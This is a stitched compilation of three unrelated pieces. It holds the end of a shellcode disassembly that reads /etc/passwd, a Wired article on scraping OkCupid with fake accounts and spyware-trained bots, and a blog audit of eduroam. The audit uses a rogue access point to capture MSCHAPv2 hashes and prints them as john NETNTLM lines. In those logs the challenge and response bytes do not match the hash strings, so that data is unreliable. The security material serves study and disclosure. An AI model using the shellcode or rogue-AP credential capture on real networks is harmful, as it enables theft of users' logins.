00000046 7764 ja 0xac
00000048 00 db 0x00

Call 0x2. Be aware that 0x3D-0x48 is a data section; it contains nothing but the path /etc/passwd.

00000002 B805000000 mov eax,0x5
00000007 5B pop ebx
00000008 31C9 xor ecx,ecx
0000000A CD80 int 0x80

Move 5 to EAX for syscall 5, which is open(). Point EBX to /etc/passwd and execute. The file descriptor (for example 3) is returned in EAX.

0000000C 89C3 mov ebx,eax
0000000E B803000000 mov eax,0x3
00000013 89E7 mov edi,esp
00000015 89F9 mov ecx,edi
00000017 BA00100000 mov edx,0x1000
0000001C CD80 int 0x80

Here the syscall for read() is executed. EAX is set to 3 (the read() syscall number) and EBX holds the file descriptor returned by open(). ECX points to the buffer at EDI, and EDX, which holds the buffer size, is set to 0x1000.

0000001E 89C2 mov edx,eax
00000020 B804000000 mov eax,0x4
00000025 BB01000000 mov ebx,0x1
0000002A CD80 int 0x80

Finally the result is written (syscall 4 is write()) to standard output.

0000002C B801000000 mov eax,0x1
00000031 BB00000000 mov ebx,0x0
00000036 CD80 int 0x80

And exit. So that was it for the last analysis.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: Assembly Language and Shellcoding on Linux
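As a footnote to the read_file analysis: the bytes at offsets 0x3D-0x48, which ndisasm mis-decodes as instructions (das, jo, jnc, ...), really are just the path string. Reassembling them from the opcode column of the disassembly shows this directly (a quick verification of my own, not part of the original write-up):

```python
# Opcode bytes taken from the disassembly of offsets 0x3D-0x48:
# 2F 65 74 63 2F 70 61 73 73 77 64 00
data = bytes([0x2F, 0x65, 0x74, 0x63, 0x2F, 0x70, 0x61,
              0x73, 0x73, 0x77, 0x64, 0x00])
print(data.rstrip(b'\x00').decode())  # /etc/passwd
```

The trailing 0x00 is the NUL terminator that the call/pop trick hands to open() as part of the path string.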
17. How a Math Genius Hacked OkCupid to Find True Love

By Kevin Poulsen, 01.21.14, 6:30 AM

Mathematician Chris McKinlay hacked OkCupid to find the girl of his dreams. Photo: Emily Shur

Chris McKinlay was folded into a cramped fifth-floor cubicle in UCLA’s math sciences building, lit by a single bulb and the glow from his monitor. It was 3 in the morning, the optimal time to squeeze cycles out of the supercomputer in Colorado that he was using for his PhD dissertation. (The subject: large-scale data processing and parallel numerical methods.) While the computer chugged, he clicked open a second window to check his OkCupid inbox.

McKinlay, a lanky 35-year-old with tousled hair, was one of about 40 million Americans looking for romance through websites like Match.com, J-Date, and e-Harmony, and he’d been searching in vain since his last breakup nine months earlier. He’d sent dozens of cutesy introductory messages to women touted as potential matches by OkCupid’s algorithms. Most were ignored; he’d gone on a total of six first dates.

On that early morning in June 2012, his compiler crunching out machine code in one window, his forlorn dating profile sitting idle in the other, it dawned on him that he was doing it wrong. He’d been approaching online matchmaking like any other user. Instead, he realized, he should be dating like a mathematician.

OkCupid was founded by Harvard math majors in 2004, and it first caught daters’ attention because of its computational approach to matchmaking. Members answer droves of multiple-choice survey questions on everything from politics, religion, and family to love, sex, and smartphones.
On average, respondents select 350 questions from a pool of thousands—“Which of the following is most likely to draw you to a movie?” or “How important is religion/God in your life?” For each, the user records an answer, specifies which responses they’d find acceptable in a mate, and rates how important the question is to them on a five-point scale from “irrelevant” to “mandatory.” OkCupid’s matching engine uses that data to calculate a couple’s compatibility. The closer to 100 percent—mathematical soul mate—the better.

But mathematically, McKinlay’s compatibility with women in Los Angeles was abysmal. OkCupid’s algorithms use only the questions that both potential matches decide to answer, and the match questions McKinlay had chosen—more or less at random—had proven unpopular. When he scrolled through his matches, fewer than 100 women would appear above the 90 percent compatibility mark. And that was in a city containing some 2 million women (approximately 80,000 of them on OkCupid). On a site where compatibility equals visibility, he was practically a ghost.

He realized he’d have to boost that number. If, through statistical sampling, McKinlay could ascertain which questions mattered to the kind of women he liked, he could construct a new profile that honestly answered those questions and ignored the rest. He could match every woman in LA who might be right for him, and none that weren’t.

Chris McKinlay used Python scripts to riffle through hundreds of OkCupid survey questions. He then sorted female daters into seven clusters, like “Diverse” and “Mindful,” each with distinct characteristics. Photo: Mauricio Alejo

Even for a mathematician, McKinlay is unusual. Raised in a Boston suburb, he graduated from Middlebury College in 2001 with a degree in Chinese. In August of that year he took a part-time job in New York translating Chinese into English for a company on the 91st floor of the north tower of the World Trade Center. The towers fell five weeks later.
(McKinlay wasn’t due at the office until 2 o’clock that day. He was asleep when the first plane hit the north tower at 8:46 am.) “After that I asked myself what I really wanted to be doing,” he says. A friend at Columbia recruited him into an offshoot of MIT’s famed professional blackjack team, and he spent the next few years bouncing between New York and Las Vegas, counting cards and earning up to $60,000 a year. The experience kindled his interest in applied math, ultimately inspiring him to earn a master’s and then a PhD in the field. “They were capable of using mathematics in lots of different situations,” he says. “They could see some new game—like Three Card Pai Gow Poker—then go home, write some code, and come up with a strategy to beat it.” Now he’d do the same for love.

First he’d need data. While his dissertation work continued to run on the side, he set up 12 fake OkCupid accounts and wrote a Python script to manage them. The script would search his target demographic (heterosexual and bisexual women between the ages of 25 and 45), visit their pages, and scrape their profiles for every scrap of available information: ethnicity, height, smoker or nonsmoker, astrological sign—“all that crap,” he says.

To find the survey answers, he had to do a bit of extra sleuthing. OkCupid lets users see the responses of others, but only to questions they’ve answered themselves. McKinlay set up his bots to simply answer each question randomly—he wasn’t using the dummy profiles to attract any of the women, so the answers didn’t matter—then scooped the women’s answers into a database.

McKinlay watched with satisfaction as his bots purred along. Then, after about a thousand profiles were collected, he hit his first roadblock. OkCupid has a system in place to prevent exactly this kind of data harvesting: It can spot rapid-fire use easily. One by one, his bots started getting banned. He would have to train them to act human.
He turned to his friend Sam Torrisi, a neuroscientist who’d recently taught McKinlay music theory in exchange for advanced math lessons. Torrisi was also on OkCupid, and he agreed to install spyware on his computer to monitor his use of the site. With the data in hand, McKinlay programmed his bots to simulate Torrisi’s click-rates and typing speed. He brought in a second computer from home and plugged it into the math department’s broadband line so it could run uninterrupted 24 hours a day. After three weeks he’d harvested 6 million questions and answers from 20,000 women all over the country.

McKinlay’s dissertation was relegated to a side project as he dove into the data. He was already sleeping in his cubicle most nights. Now he gave up his apartment entirely and moved into the dingy beige cell, laying a thin mattress across his desk when it was time to sleep.

For McKinlay’s plan to work, he’d have to find a pattern in the survey data—a way to roughly group the women according to their similarities. The breakthrough came when he coded up a modified Bell Labs algorithm called K-Modes. First used in 1998 to analyze diseased soybean crops, it takes categorical data and clumps it like the colored wax swimming in a Lava Lamp. With some fine-tuning he could adjust the viscosity of the results, thinning it into a slick or coagulating it into a single, solid glob. He played with the dial and found a natural resting point where the 20,000 women clumped into seven statistically distinct clusters based on their questions and answers. “I was ecstatic,” he says. “That was the high point of June.”

He retasked his bots to gather another sample: 5,000 women in Los Angeles and San Francisco who’d logged on to OkCupid in the past month. Another pass through K-Modes confirmed that they clustered in a similar way. His statistical sampling had worked. Now he just had to decide which cluster best suited him. He checked out some profiles from each.
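The article only gestures at how k-modes works, so here is a minimal sketch of the idea (my own illustrative implementation, not McKinlay’s code): cluster categorical records around “modes”, the per-column most frequent values, using mismatch counts in place of Euclidean distance.

```python
import random
from collections import Counter

def kmodes(rows, k, iters=20, seed=0):
    """Minimal k-modes: assign each categorical tuple to the nearest mode by
    Hamming distance (number of mismatched attributes), then recompute each
    mode column-wise. Assumes the data contains at least k distinct rows."""
    rng = random.Random(seed)
    modes = rng.sample(sorted(set(rows)), k)  # k distinct starting modes
    assign = []
    for _ in range(iters):
        # assignment step: nearest mode = fewest mismatched attributes
        assign = [min(range(k),
                      key=lambda c: sum(a != b for a, b in zip(r, modes[c])))
                  for r in rows]
        # update step: each mode becomes the most common value per column
        for c in range(k):
            members = [r for r, a in zip(rows, assign) if a == c]
            if members:
                modes[c] = tuple(Counter(col).most_common(1)[0][0]
                                 for col in zip(*members))
    return assign

# toy "survey answers" with two obvious groups
rows = [("yes", "indie"), ("yes", "indie"), ("yes", "indie"),
        ("no", "pop"), ("no", "pop"), ("no", "pop")]
assign = kmodes(rows, 2)
print(assign)
```

McKinlay’s real run used k = 7 on 20,000 profiles with far more columns; the dataset above is only a toy illustration of the clustering step.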
One cluster was too young, two were too old, another was too Christian. But he lingered over a cluster dominated by women in their mid-twenties who looked like indie types, musicians and artists. This was the golden cluster. The haystack in which he’d find his needle. Somewhere within, he’d find true love. Actually, a neighboring cluster looked pretty cool too—slightly older women who held professional creative jobs, like editors and designers. He decided to go for both. He’d set up two profiles and optimize one for the A group and one for the B group.

He text-mined the two clusters to learn what interested them; teaching turned out to be a popular topic, so he wrote a bio that emphasized his work as a math professor. The important part, though, would be the survey. He picked out the 500 questions that were most popular with both clusters. He’d already decided he would fill out his answers honestly—he didn’t want to build his future relationship on a foundation of computer-generated lies. But he’d let his computer figure out how much importance to assign each question, using a machine-learning algorithm called adaptive boosting to derive the best weightings.

Source: How a Math Genius Hacked OkCupid to Find True Love - Wired Science
18. eduroam WiFi security audit or why it is broken by design

Over Christmas I got a TP-Link TL-WN722N USB WiFi device which is supported by hostapd, and finally I could test what I always wanted to test: eduroam. But first, what is eduroam? Eduroam is a WiFi network located at universities around the world with the goal of providing internet access to students and university staff at every university that supports eduroam ( https://en.wikipedia.org/wiki/Eduroam ). This means I can connect to the internet with eduroam at a university in France with my user credentials from my university in Germany. Sounds good, but how does it work? Well, the WiFi network uses WPA-Enterprise, which means you connect to an access point and the access point uses a radius server to authenticate you. Generally not a bad idea. But my tests have shown that the eduroam network is broken by design.

In advance

First things first. Some of my notes that I took during my tests can be seen here. I will provide them as a "POC||GTFO". But I stripped them so as not to provide a step-by-step tutorial in "how to pwn eduroam".

The set-up

I configured a VM with Debian Wheezy with an installation of hostapd. I had never configured a radiusd and wondered how I could get the user credentials if a client device authenticated against my rogue access point. Well, I found this cool project https://github.com/brad-anton/freeradius-wpe.git. This does everything for me and I do not have to patch the radiusd myself. But honestly, I do not trust this modified radiusd entirely, and after I configured everything I turned off the network interface of the VM which provides an internet connection, to prevent the radiusd from leaking anything about my tests to the internet.

Test without a certificate modification

For my first test I just set everything up and started it. I started wpa_supplicant on my laptop and it did not connect to the rogue access point because the certificate is wrong. Ok, but what about my Android device?
I activated the WiFi on my mobile phone and ... WTF, I am connected to the rogue access point. In the log file of the rogue access point I can read my user credentials in PLAINTEXT. Ok, that is not good. But what went wrong? The certificate used by the rogue access point is still invalid. The configuration on my Android device is completely flawed. I configured my Android device like the tutorial on my university's website said. The tutorial said that I did not have to configure any CA and should use PAP for phase 2 of the WPA-Enterprise authentication. Now you can say "Idiot, everyone can see that this is wrong!". But in my defense, I always thought that Android then uses its own installed CAs to check if the certificate of the access point is valid. Hell, even the network-manager on ubuntu warns you if you give no CA in the settings. And I used PAP (I knew it sends the user credentials in cleartext) because from my university's tutorials I thought that eduroam only supports PAP for phase 2 authentication. But both assumptions were wrong. After I installed the "Deutsche_Telekom_Root_CA_2" CA on my Android device and used it in the WiFi configuration, it no longer connects to the rogue access point. Also, when the wpa_supplicant configuration is missing this line:

ca_cert="/etc/ssl/certs/Deutsche_Telekom_Root_CA_2.pem"

it also ignores the invalid certificate of the access point and just connects to it. I wrote the helpdesk of my university about the wrong tutorial for using eduroam on Android devices. The helpdesk replied that they knew about this problem with the CA, but that Android is not able to verify the certificate of the access point. This is obviously wrong. And the funny thing about this is, they used screenshots in their tutorial to make it easier for everyone to configure eduroam on Android devices. And on these screenshots you can see the "CA certificate" option which is just ignored.
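Configured correctly, a wpa_supplicant network block for eduroam pins the CA and uses MSCHAPv2 for phase 2. A sketch (identity, password, and the certificate path are placeholders; subject_match additionally restricts which server certificate subjects are accepted):

```
network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    eap=TTLS
    phase2="auth=MSCHAPV2"
    identity="user@example-university.de"
    password="not-my-real-password"
    # pin the CA instead of accepting any server certificate
    ca_cert="/etc/ssl/certs/Deutsche_Telekom_Root_CA_2.pem"
    # restrict the accepted server certificate subject
    subject_match="radius.ruhr-uni-bochum.de"
}
```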
Also, their reply told me some other interesting things about eduroam, which I checked in my next tests. As a summary of my first test: always configure the CA for eduroam (and in general for all WPA-Enterprise WiFi networks) and always use MSCHAPv2 instead of PAP. Even if your device connects to a rogue access point, the adversary only gets challenge-response values and has to brute-force them. If your password is strong enough, the adversary cannot use your credentials (at least he has to spend time brute-forcing MSCHAPv2 ...).

Test with my own certificate

In the email reply from the helpdesk of my university, they wrote that if the user added the CA to his WiFi settings, this would destroy the idea behind eduroam (to be able to connect to every eduroam access point in the world). First, I wondered about the "destroy the idea behind eduroam" part, but then I thought "They would not be so stupid, would they?". I always thought that they had agreed to use the "Deutsche_Telekom_Root_CA_2" CA for eduroam. But this is not the case. A friend of mine was in Belgium and had to change the configured CA in his WiFi settings to connect to eduroam there. I searched through the eduroam tutorials of universities in countries other than Germany and they all used different CAs. Normally, the access point is configured to use a specific radius server which will send the certificate to the client (I do not know if it is even possible to use WPA-Enterprise in any other way). This means that by not agreeing on one CA for the entire eduroam infrastructure, the user has to NOT configure any CA in his WiFi settings to be able to use eduroam in the way it was intended. And with this, we have the first reason for eduroam being insecure by design. The email also stated that even if the user added the CA to his WiFi configuration, this would not help. An adversary could get a certificate signed by the CA and could therefore set up a rogue access point.
This statement is true. But this holds for every public key infrastructure. For HTTPS, for example, a CA should not sign my certificate for "gmail.com" (unless I can prove that this is my domain/address). And at this point a question comes to mind. The client gets the certificate from the access point and then checks with the configured CA if it is valid. But valid for what address? Normally, the CN (common name) in the certificate is checked against the address being used. But against what address is the certificate provided by the radius server checked? A valid connection to the eduroam WiFi at my university with wpa_supplicant looks like this:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with 00:25:45:b5:38:22
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully
wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP]
wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=]

The address given in the CN is "radius.ruhr-uni-bochum.de". But I never configured this anywhere. So in my next test I created my own CA and signed my own certificate with it.
The certificate for the rogue access point and the CA got the following values:

CA:
C=DE
ST=Some-State
O=h4des.org
CN=sqall

certificate for rogue access point:
C=DE
ST=Some-State
O=h4des.org
CN=some-rogue-access-point
emailAddress=sqall

You can see that the CN field got "some-rogue-access-point" as its value, which is not an address of a radius server at all. First I tried wpa_supplicant with my newly created CA certificate in the configuration file:

ca_cert="./CA.cert.pem"

And what happened? wpa_supplicant connects to the rogue access point without any problems and discloses my user credentials as MSCHAPv2 challenge-response values. The output of wpa_supplicant shows that the radius server uses my newly created certificate:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with b0:48:7a:88:fc:7a
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-State/O=h4des.org/CN=some-rogue-access-point/emailAddress=sqall'
EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request

Next I tested it on my Android 4.0.4 device. I installed my own CA on the device and changed the eduroam WiFi settings to check for this CA. The device connects to the rogue access point without any problems and also discloses my user credentials. As a summary of this test: the certificate for the rogue access point just has to be a valid certificate signed by the configured CA. It does not matter for which address the certificate was issued; it just has to be valid.
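To make the flaw explicit: the client's acceptance logic effectively reduces to "is the chain valid?", with no name check at all. A small sketch of my own (an illustration, not actual wpa_supplicant code) contrasting the check that is performed with the one that should be:

```python
from typing import Optional

def accept_server_cert(chain_valid: bool,
                       presented_cn: str,
                       expected_cn: Optional[str]) -> bool:
    """A client should require both a valid chain AND a name match.
    The observed eduroam behaviour corresponds to expected_cn = None:
    any certificate signed by the configured CA is accepted."""
    if not chain_valid:
        return False
    return expected_cn is None or presented_cn == expected_cn

# the rogue certificate from the test above
rogue = accept_server_cert(True, "some-rogue-access-point", None)
pinned = accept_server_cert(True, "some-rogue-access-point",
                            "radius.ruhr-uni-bochum.de")
print(rogue, pinned)  # True False
```

With a pinned name the rogue certificate would be rejected even though its chain verifies, which is exactly the check that is missing here.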
Normally, the problem with forging a valid host in a TLS/SSL connection (such as the HTTPS example for "gmail.com" I gave earlier) is that a CA does not sign your certificate request unless you own the domain/address (or rather, the CA should not). But if any address in the CN is accepted, it is no problem to get a signed certificate. Here lies the second reason for eduroam being insecure by design. I do not know if the vendor offers a service to sign your own certificates with the "Deutsche_Telekom_Root_CA_2" certificate. But normally they do. And if the vendor does, there is absolutely no problem to configure a rogue access point which cannot be distinguished from a valid one. It should be mentioned that the address of the radius server can be configured in the iDevice profiles. But I have no iDevice, and so I cannot check if the CN of the certificate provided by the radius server is checked against the configured address. In wpa_supplicant, for example, I did not find any configuration option for the address of the radius server. But I found the option to match certain criteria of the accepted server certificate with "subject_match". Android 4.0.4 does not provide any such options.

Test with my own intermediate CA

After an arbitrary signed certificate was tested, the next interesting thing is a certificate signed by an intermediate CA.
When we look at the wpa_supplicant output when connecting to a benign access point:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with 00:25:45:b5:38:22
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully
wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP]
wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=]

we can see that the certificate is signed by the CA of my university (and not directly by the "Deutsche_Telekom_Root_CA_2" CA). Actually, the chain is "Deutsche_Telekom_Root_CA_2" -> "DFN-Verein PCA Global - G01" -> "Ruhr-Universitaet Bochum CA". So my idea at this point was: it could be difficult (and perhaps costly) to get a certificate signed by the "Deutsche_Telekom_Root_CA_2" CA, but a certificate signed by the university is very easy to get as a student or university staff member. So I created my own intermediate CA, signed by my previously created CA, and generated a new certificate for my rogue eduroam access point.
The values for all these CAs and the certificate are:

CA:
C=DE
ST=Some-State
O=h4des.org
CN=sqall

intermediate CA:
C=DE
ST=Some-Other-State
O=h4des.org
OU=intermediate
CN=it is sqall again

certificate for rogue access point:
C=DE
ST=Some-Other-State
O=h4des.org
OU=intermediate certificate
CN=again sqall

Again, wpa_supplicant is tried first. The settings are the same as in the previous test (this means wpa_supplicant uses the certificate of the CA to check the validity of the rogue access point). The output of wpa_supplicant shows that the rogue access point offers my new certificate signed by the intermediate CA and that the client connects without any problems:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with b0:48:7a:88:fc:7a
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate/CN=it is sqall again'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate certificate/CN=again sqall'
EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request

The log file of my modified radius server shows me the MSCHAPv2 challenge-response values:

mschap: Sat Jan 11 19:42:27 2014
username: pawlxyz@ruhr-uni-bochum.de
challenge: 43:cd:42:0f:a6:14:46:4e
response: 0d:b8:47:c0:11:a6:c9:10:a2:14:99:af:1d:15:d6:ef:4a:89:d3:95:aa:ba:2d:2b
john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$42cd490fa604464c$0db486c012a6c910a21379ef1d15d6ff4a89d395baba2d2c

Next I tested my Android 4.0.4 device. Like the wpa_supplicant client, it connects without any problems (because the access point is now considered valid).
As a summary of this test: the client accepts certificates that are signed by intermediate CAs. In this constellation, it is the third reason for eduroam being insecure by design. It might be difficult to get a certificate signed by the main CA. But when intermediate CAs are in place, it could be a lot easier to get a valid certificate. The "Deutsche_Telekom_Root_CA_2" CA signed the "DFN-Verein PCA Global - G01" intermediate CA, and this signed the CA of my university. I think that the "DFN-Verein PCA Global - G01" intermediate CA has signed a lot of university CAs. And a lot of universities (like mine) offer the service of signing your server certificate (when it is inside the namespace of the university). If you are able to get a certificate that is signed by any of the CAs in the chain, you can forge a valid eduroam access point.

Test with a server certificate signed by my university

Ok, enough of the talk about "uhh, it is insecure with this public key infrastructure!" and "it is theoretically possible to ...", let's break it! I helped the university to set up some servers, so I have access to a certificate signed by the university CA. And I configured my rogue access point to use this certificate. This certificate obviously does not have "radius.ruhr-uni-bochum.de" as its CN value. It is valid for other addresses, which I censored out. We saw in the tests above that the value in the CN field does not matter. First I tried wpa_supplicant, now with the settings that should be used for a valid eduroam access point.
This is the output:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with b0:48:7a:88:fc:7a
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/OU=xxx/CN=xxx'
EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request

And we can see that the client thinks it is a valid eduroam access point. The log file of the modified radius server shows my MSCHAPv2 credentials:

mschap: Sun Jan 12 01:24:03 2014
username: pawlxyz@ruhr-uni-bochum.de
challenge: 28:f5:bf:4d:3f:fe:bf:a2
response: 7a:ab:24:87:35:82:46:40:33:73:89:5a:77:bb:ee:c0:4b:56:8b:a8:67:af:e9:94
john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$28f5bb4d8ffaafa2$7aab248735824641d373895a77dbeec04b568ba867afe994

The same goes for my Android 4.0.4 mobile phone. A client is not able to distinguish a benign eduroam access point from my rogue access point. A fun fact: when I first started my rogue access point with the valid certificate, the mobile device of one of my neighbors connected instantly to it (his or her login credentials are from a different university than mine).
One has to love all the folks that have their WiFi always turned on.

Test with a client certificate signed by my university

My university offers the service of providing any student with a client certificate signed by the university's CA. My idea was "most clients do not provide options for the radius server address; perhaps they do not check if the certificate is only meant for clients". Beforehand, I can tell you that wpa_supplicant and Android 4.0.4 do check (I did not test others). I used a certificate with these key usages, signed by my university's CA:

X509v3 Key Usage:
Digital Signature, Non Repudiation, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Client Authentication, E-mail Protection

So, when I try to connect with wpa_supplicant I get this output:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with b0:48:7a:88:fc:7a
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
TLS: Certificate verification failed, error 26 (unsupported certificate purpose) depth 0 for '/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall'
wlan0: CTRL-EVENT-EAP-TLS-CERT-ERROR reason=0 depth=0 subject='/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall' err='unsupported certificate purpose'
SSL: SSL3 alert: write (local SSL3 detected an error):fatal:unsupported certificate
OpenSSL: openssl_handshake - SSL_connect error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed

So we can clearly see that wpa_supplicant checks the certificate purpose. The same goes for Android 4.0.4; it just reports an authentication error. To summarize this part: this does not have anything to do with the design or security of the eduroam network. It is purely an implementation detail of the client software used.
I just tested it in the hope of finding a "fuck up" in some WiFi clients, but was disappointed.

Conclusion

In this part I conclude my short security audit of the eduroam WiFi network. In my opinion it has a huge design flaw which cannot be fixed without changing the whole public key infrastructure. To me it seems that when they were designing the whole eduroam network they just thought "We need some public key cryptography for eduroam. The protocol supports TLS/SSL for authentication. It is used by the internet. So let us just use it too!". Using different CAs in different countries, which have signed a lot of intermediate CAs, is not a good idea when the clients do not or cannot check the address of the radius server which provides the certificate. Every certificate that is signed by one of the intermediate CAs or by the top CA in use is valid for any client that tries to connect to the eduroam WiFi. Furthermore, the idea of eduroam was to provide a network to which a client from a different country could also connect (for example, a client from Germany could connect to an eduroam access point when he is in Belgium). This is not possible when different top CAs are used in each country (or perhaps even within a country). Or rather, this is only possible when certificates are not checked. But when they are not checked, what is the point of using TLS/SSL? The next thing is, a lot of universities (like mine) provide flawed tutorials for configuring WiFi clients for eduroam. Even when MSCHAPv2 is available, the tutorials often use PAP to authenticate the client. PAP sends all user credentials in plaintext, whereas MSCHAPv2 provides a challenge-response procedure. Furthermore, a lot of tutorials do not set up the CA to check the server certificate. Without this setting the client connects to any eduroam access point without checking the validity of the server certificate.
This means that when a user configures her client with the help of the flawed tutorials and uses eduroam, she might just as well shout out her credentials every time she connects to the WiFi network. The really bad thing about this is that when an adversary gets someone's user credentials, he often has the credentials for other services of the university as well, because the same account is used (in the case of my university: the email account, the MSDNAA account, ...). I heard of some universities that even use these credentials to let students register and deregister for exams of the offered courses.

The only way a client can protect herself against this attack is by using MSCHAPv2. When MSCHAPv2 is used, the adversary still has to brute force the password after he successfully forges an eduroam access point. This means the security comes down to the strength of her password (and the strength of MSCHAPv2 ... which uses DES and can be cracked relatively fast with services like https://www.cloudcracker.com/ :/ ).

In my opinion, the only way to really fix this issue is to use a dedicated public key infrastructure for the whole eduroam WiFi design. If a dedicated CA were used for eduroam (perhaps with intermediate CAs for universities, to be used only for certificates of the eduroam infrastructure), there would be no way for an attacker to forge a valid eduroam access point, because he could not get a signed certificate for it. If the clients set up this CA in their eduroam settings, they would not connect to rogue access points. Even if a client is configured to use PAP instead of MSCHAPv2, the user credentials would then be reasonably secure. But a dedicated public key infrastructure only works when the clients are configured correctly, and this means that the universities first have to fix their tutorials for the eduroam WiFi. I wrote my university about this issue and they fixed some tutorials (for example for Android).
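As a concrete example of a client configuration that actually pins the CA and checks the server name, here is a wpa_supplicant network block of the kind the fixed tutorials should recommend. The CA path, radius server name and identity are placeholders for your university's actual values:

```
network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    eap=TTLS
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/university-ca.pem"
    subject_match="radius.example-university.edu"
    identity="loginname@example-university.edu"
    password="..."
}
```

The important lines are ca_cert (so the server certificate is actually validated against a CA) and subject_match (so a certificate for some other host under the same CA chain is rejected), together with MSCHAPV2 instead of PAP as the inner method.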
